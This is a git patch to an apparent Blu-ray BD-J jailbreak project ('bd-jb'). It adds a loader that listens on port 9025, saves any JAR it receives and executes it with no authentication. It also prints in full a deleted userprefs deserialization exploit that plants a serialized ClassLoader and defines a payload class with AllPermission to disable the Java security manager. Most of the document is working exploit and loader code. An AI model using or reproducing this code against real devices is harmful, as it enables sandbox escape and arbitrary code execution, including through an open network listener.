From 44713ef59f897ff2125efccbdcb5d07dbe1ffdb5 Mon Sep 17 00:00:00 2001 From: Andy Nguyen Date: Thu, 28 Nov 2024 19:02:08 +0100 Subject: [PATCH] Add remote JAR loader and remove userprefs exploit. --- Makefile | 39 ++++++---- bdmv/bdjo.xml | 2 +- src/com/bdjb/Exploit.java | 45 ++---------- src/com/bdjb/Loader.java | 73 +++++++++++++++++++ .../{ExploitXlet.java => LoaderXlet.java} | 6 +- src/com/bdjb/Screen.java | 19 ++++- ...xploitXlet.perm => bluray.LoaderXlet.perm} | 0 .../exploit/sandbox/ExploitUserPrefsImpl.java | 61 ---------------- .../exploit/sandbox/PayloadClassLoader.java | 57 --------------- .../sandbox/PayloadClassLoaderSerializer.java | 25 ------- 10 files changed, 121 insertions(+), 206 deletions(-) create mode 100644 src/com/bdjb/Loader.java rename src/com/bdjb/{ExploitXlet.java => LoaderXlet.java} (91%) rename src/com/bdjb/{bluray.ExploitXlet.perm => bluray.LoaderXlet.perm} (100%) delete mode 100644 src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java delete mode 100644 src/com/bdjb/exploit/sandbox/PayloadClassLoader.java delete mode 100644 src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java diff --git a/Makefile b/Makefile index a888512..db5e02f 100644 --- a/Makefile +++ b/Makefile @@ -5,8 +5,12 @@ LIB = lib SRC = src TOOLS = tools -CLASSES = \ - $(SRC)/com/bdjb/ExploitXlet.java \ +LOADER_CLASSES = \ + $(SRC)/com/bdjb/LoaderXlet.java \ + $(SRC)/com/bdjb/Loader.java \ + $(SRC)/com/bdjb/Screen.java \ + +EXPLOIT_CLASSES = \ $(SRC)/com/bdjb/Exploit.java \ $(SRC)/com/bdjb/Screen.java \ $(SRC)/com/bdjb/api/API.java \ @@ -25,39 +29,42 @@ CLASSES = \ $(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \ $(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \ - $(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \ $(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \ - $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \ $(SRC)/com/bdjb/exploit/sandbox/Payload.java \ $(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \ JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar" -all: directory serialized classes jar bdjo_bdmv +all: loader exploit -directory: +loader: build_directory loader_classes loader_jar loader_bdjo_bdmv + +exploit: build_directory exploit_classes exploit_jar + +build_directory: mkdir -p $(BUILD) -serialized: - javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java - java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser - rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class +loader_classes: + javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES) -classes: - javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES) +exploit_classes: + javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES) -jar: - rm -rf $(BUILD)/jdk +loader_jar: mkdir -p $(DISC)/BDMV/JAR - cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm + cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd .. java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar -bdjo_bdmv: +exploit_jar: + rm -rf $(BUILD)/jdk + cd $(BUILD) && jar cf 00000.jar . && cd .. + +loader_bdjo_bdmv: mkdir -p $(DISC)/BDMV/BDJO java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv diff --git a/bdmv/bdjo.xml b/bdmv/bdjo.xml index da6cc69..21e4266 100644 --- a/bdmv/bdjo.xml +++ b/bdmv/bdjo.xml @@ -15,7 +15,7 @@ 0x0 - com.bdjb.ExploitXlet + com.bdjb.LoaderXlet 128 1 diff --git a/src/com/bdjb/Exploit.java b/src/com/bdjb/Exploit.java index cedef3c..e7bc494 100644 --- a/src/com/bdjb/Exploit.java +++ b/src/com/bdjb/Exploit.java @@ -9,26 +9,16 @@ package com.bdjb; import com.bdjb.exploit.kernel.ExploitKernelInterface; import com.bdjb.exploit.sandbox.ExploitDefaultImpl; -import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl; import com.bdjb.exploit.sandbox.ExploitSandboxInterface; import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl; -import java.io.FileOutputStream; -import java.io.InputStream; -import java.io.OutputStream; -import java.net.InetAddress; -import java.net.ServerSocket; -import java.net.Socket; - -class Exploit implements Runnable { - static void init() { - Screen.println("[+] bd-jb by theflow"); +import java.lang.reflect.Method; +public class Exploit { + public static void main(Method screenPrintln) { + Screen.setRemotePrintln(screenPrintln); Screen.println("[*] Escaping Java Sandbox..."); - Class[] sandboxExploits = - new Class[] { - ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class - }; + Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class}; for (int i = 0; i < sandboxExploits.length; i++) { try { @@ -46,29 +36,4 @@ class Exploit implements Runnable { Screen.println("[-] Error could not disable security manager."); } } - - static void start() { - new Thread(new Exploit()).start(); - } - - public void run() { - if (System.getSecurityManager() != null) { - return; - } - - Screen.println("[*] Exploiting kernel..."); - - Class[] kernelExploits = new Class[] {}; - - for (int i = 0; i < kernelExploits.length; i++) { - try { - ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance(); - if (exploit.trigger()) { - break; - } - } catch (Exception e) { - continue; - } - } - } } diff --git a/src/com/bdjb/Loader.java b/src/com/bdjb/Loader.java new file mode 100644 index 0000000..6a83944 --- /dev/null +++ b/src/com/bdjb/Loader.java @@ -0,0 +1,73 @@ +/* + * Copyright (C) 2021 Andy Nguyen + * + * This software may be modified and distributed under the terms + * of the MIT license. See the LICENSE file for details. + */ + +package com.bdjb; + +import java.io.FileOutputStream; +import java.io.InputStream; +import java.io.OutputStream; +import java.net.ServerSocket; +import java.net.Socket; +import java.net.URL; +import java.lang.reflect.Method; +import org.dvb.lang.DVBClassLoader; + +class Loader implements Runnable { + private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar"; + + private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit"; + private static final String MAIN_METHOD_NAME = "main"; + private static final String PRINTLN_METHOD_NAME = "println"; + + static void startJarLoader() { + new Thread(new Loader()).start(); + } + + public void run() { + Screen.println("[+] bd-jb by theflow"); + + while (true) { + Screen.println("[*] Listening for remote JAR on port 9025..."); + + try { + ServerSocket serverSocket = new ServerSocket(9025); + Socket socket = serverSocket.accept(); + InputStream inputStream = socket.getInputStream(); + OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE); + + byte[] buf = new byte[8192]; + int total = 0; + int read; + while ((read = inputStream.read(buf)) > 0) { + outputStream.write(buf, 0, read); + total += read; + } + + outputStream.close(); + inputStream.close(); + + serverSocket.close(); + + Screen.println("[+] Received " + total + " bytes"); + + Screen.println("[+] Launching JAR..."); + + DVBClassLoader dvbClassLoader = + DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)}); + Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME); + Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class}); + Method screenPrintln = + Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class}); + main.invoke(null, new Object[] {screenPrintln}); + + Screen.println("[+] JAR exited"); + } catch (Exception e) { + Screen.println("[-] Error: " + e.getMessage()); + } + } + } +} diff --git a/src/com/bdjb/ExploitXlet.java b/src/com/bdjb/LoaderXlet.java similarity index 91% rename from src/com/bdjb/ExploitXlet.java rename to src/com/bdjb/LoaderXlet.java index 92bd947..9299dc5 100644 --- a/src/com/bdjb/ExploitXlet.java +++ b/src/com/bdjb/LoaderXlet.java @@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext; import org.havi.ui.HScene; import org.havi.ui.HSceneFactory; -public class ExploitXlet implements Xlet { +public class LoaderXlet implements Xlet { private HScene scene; private Screen screen; public void initXlet(XletContext context) { - Exploit.init(); - screen = Screen.getInstance(); screen.setSize(1920, 1080); // BD screen size @@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet { public void startXlet() { screen.setVisible(true); scene.setVisible(true); - Exploit.start(); + Loader.startJarLoader(); } public void pauseXlet() { diff --git a/src/com/bdjb/Screen.java b/src/com/bdjb/Screen.java index c3443ad..b3e0c96 100644 --- a/src/com/bdjb/Screen.java +++ b/src/com/bdjb/Screen.java @@ -11,6 +11,7 @@ import java.awt.Color; import java.awt.Container; import java.awt.Font; import java.awt.Graphics; +import java.lang.reflect.Method; import java.util.ArrayList; public class Screen extends Container { @@ -22,13 +23,27 @@ public class Screen extends Container { private static final Screen instance = new Screen(); + private static Method remoteScreenPrintln = null; + public static Screen getInstance() { return instance; } + public static void setRemotePrintln(Method screenPrintln) { + remoteScreenPrintln = screenPrintln; + } + public static void println(String msg) { - messages.add(msg); - instance.repaint(); + if (remoteScreenPrintln != null) { + try { + remoteScreenPrintln.invoke(null, new Object[] {msg}); + } catch (Exception e) { + // Ignore. + } + } else { + messages.add(msg); + instance.repaint(); + } } public void paint(Graphics g) { diff --git a/src/com/bdjb/bluray.ExploitXlet.perm b/src/com/bdjb/bluray.LoaderXlet.perm similarity index 100% rename from src/com/bdjb/bluray.ExploitXlet.perm rename to src/com/bdjb/bluray.LoaderXlet.perm diff --git a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java b/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java deleted file mode 100644 index 3d1979e..0000000 --- a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Copyright (C) 2021 Andy Nguyen - * - * This software may be modified and distributed under the terms - * of the MIT license. See the LICENSE file for details. - */ - -package com.bdjb.exploit.sandbox; - -import java.io.FileOutputStream; -import java.io.InputStream; -import java.io.ObjectOutputStream; -import java.io.OutputStream; -import org.havi.ui.HSceneFactory; - -/** Implementation of the userprefs deserialization exploit. */ -public class ExploitUserPrefsImpl implements ExploitSandboxInterface { - private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs"; - - private static final String PAYLOAD_CLASS_LOADER_SER_FILE = - "/com/bdjb/exploit/sandbox/PayloadClassLoader.ser"; - - public boolean trigger() throws Exception { - try { - // Overwrite userprefs with a serialized PayloadClassLoader. - InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE); - OutputStream outputStream = new FileOutputStream(USERPREFS_FILE); - - byte[] buf = new byte[8192]; - int read; - while ((read = inputStream.read(buf)) > 0) { - outputStream.write(buf, 0, read); - } - - outputStream.close(); - inputStream.close(); - - // Trigger deserialization vulnerability. - try { - HSceneFactory.getInstance().getDefaultHScene(); - } catch (ClassCastException e) { - // Exception expected. - - // Instantiate the payload class. - PayloadClassLoader.getInstance().newPayload(); - - return System.getSecurityManager() == null; - } - } finally { - // Restore userprefs file. - String[][] preferences = new String[9][]; - preferences[3] = new String[] {"26"}; - ObjectOutputStream outputStream = - new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE)); - outputStream.writeObject(preferences); - outputStream.close(); - } - - return false; - } -} diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java deleted file mode 100644 index cae2277..0000000 --- a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java +++ /dev/null @@ -1,57 +0,0 @@ -/* - * Copyright (C) 2021 Andy Nguyen - * - * This software may be modified and distributed under the terms - * of the MIT license. See the LICENSE file for details. - */ - -package com.bdjb.exploit.sandbox; - -import java.io.ByteArrayOutputStream; -import java.io.InputStream; -import java.io.ObjectInputStream; -import java.io.Serializable; -import java.security.AllPermission; -import java.security.Permissions; -import java.security.ProtectionDomain; - -/** ClassLoader subclass that is instantiated on deserialization. */ -class PayloadClassLoader extends ClassLoader implements Serializable { - private static final long serialVersionUID = 0x4141414141414141L; - - private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class"; - private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload"; - - private static PayloadClassLoader instance; - - static PayloadClassLoader getInstance() { - return instance; - } - - private void readObject(ObjectInputStream stream) { - instance = this; - } - - void newPayload() throws Exception { - InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE); - ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); - - byte[] buf = new byte[8192]; - int read; - while ((read = inputStream.read(buf)) > 0) { - outputStream.write(buf, 0, read); - } - - inputStream.close(); - - byte[] payload = outputStream.toByteArray(); - - // Instantiate the payload class with all permissions to disable the security manager. - Permissions permissions = new Permissions(); - permissions.add(new AllPermission()); - ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions); - Class payloadClass = - defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain); - payloadClass.newInstance(); - } -} diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java deleted file mode 100644 index c985ae2..0000000 --- a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java +++ /dev/null @@ -1,25 +0,0 @@ -/* - * Copyright (C) 2021 Andy Nguyen - * - * This software may be modified and distributed under the terms - * of the MIT license. See the LICENSE file for details. - */ - -package com.bdjb.exploit.sandbox; - -import com.bdjb.exploit.sandbox.PayloadClassLoader; -import java.io.FileOutputStream; -import java.io.ObjectOutputStream; - -/** Simple util to create a serialized object of the PayloadClassLoader class. */ -class PayloadClassLoaderSerializer { - public static void main(String[] args) { - try { - ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0])); - objectOutputStream.writeObject(new PayloadClassLoader()); - objectOutputStream.close(); - } catch (Exception e) { - e.printStackTrace(); - } - } -}